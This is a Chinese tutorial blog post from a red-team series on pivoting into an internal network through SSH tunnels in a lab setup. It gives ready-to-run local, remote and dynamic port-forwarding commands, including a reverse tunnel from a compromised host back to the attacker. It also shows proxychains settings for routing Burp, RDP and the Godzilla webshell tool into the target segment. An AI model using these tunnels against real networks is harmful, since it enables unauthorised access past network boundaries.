红队渗透系列-内网穿透之SSH隧道端口转发及burp等工具proxychains代理设置

红队渗透系列-内网穿透之SSH隧道端口转发

本文视频地址:

https://www.bilibili.com/video/BV1oP411n7uT/

条件:

获取到跳板机权限(获取到账户密码)

跳板机(边缘机)SSH服务启动

静态端口转发-本地/远程端口转发

是指转发的目标应用程序的 IP 地址和监听端口是固定的

SSH 端口转发常用参数

-L 本地端口转发

-R 远程端口转发

-C 压缩传输

-N 静默连接

-g 允许远程主机连接本地的转发端口

-f  SSH传输后台执行

-D 动态转发

靶场环境

攻击机 kali 网卡桥接模式 192.168.1.5

跳板机(边缘机)centos  网卡1桥接模式 192.168.1.24        网卡2 仅主机模式 10.10.30.128

目标机win7-3 网卡1 仅主机模式 10.10.30.77

目标机win7 x64 网卡1 仅主机模式 10.10.30.7

本地端口转发-在攻击机上执行命令

ssh  -CfNg -L 本地监听端口:目标IP:目标端口 账号@跳板机

ssh -CfNg -L 7788:10.10.30.77:80 root@192.168.1.24

渗透工具设置

火狐不需要设置代理,直接访问本地端口7788,就是访问10.10.30.77:80端口即可

http://192.168.1.5:7788/

远程桌面不需要设置代理,直接连接本地7789端口即可

ssh -CfNg -L 7789:10.10.30.77:3389 root@192.168.1.24

rdesktop 192.168.1.5:7789

远程端口转发-在跳板机(边缘机/靶机)上执行命令

ssh -CfNg -R 攻击机IP:攻击机端口:目标机IP:目标端口 攻击机账号@攻击机ip

ssh -CfNg -R 192.168.1.5:7777:10.10.30.77:80 root@192.168.1.5

火狐不需要设置代理,直接访问本地端口7777

http://127.0.0.1:7777 或者 http://localhost:7777

动态端口转发,SSH隧道的socks代理,而neo regeorg是HTTP隧道的socks代理

目标应用程序的ip地址和监听端口不固定

ssh -Nf -D 12345 root@192.168.1.24

代理工具proxychains的设置

vi /etc/proxychains4.conf

[ProxyList]

socks5 0.0.0.0 12345

渗透工具利用proxychains设置

rdesktop

proxychains rdesktop 10.10.30.77

burp

proxychains java -jar burpsuite.jar

godzilla

proxychains java -jar godzilla.jar

火狐浏览器

在setting->network-setting->Manual proxy configuration->SOCKS Host->127.0.0.1& port ->12345

火狐直接访问 http://10.10.30.77/

如果火狐走burp代理,则设置,然后burp 用proxychains启动即可

在setting->network-setting->Manual proxy configuration->HTTP Proxy->127.0.0.1& port ->8080

proxychains java -jar burp.jar

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容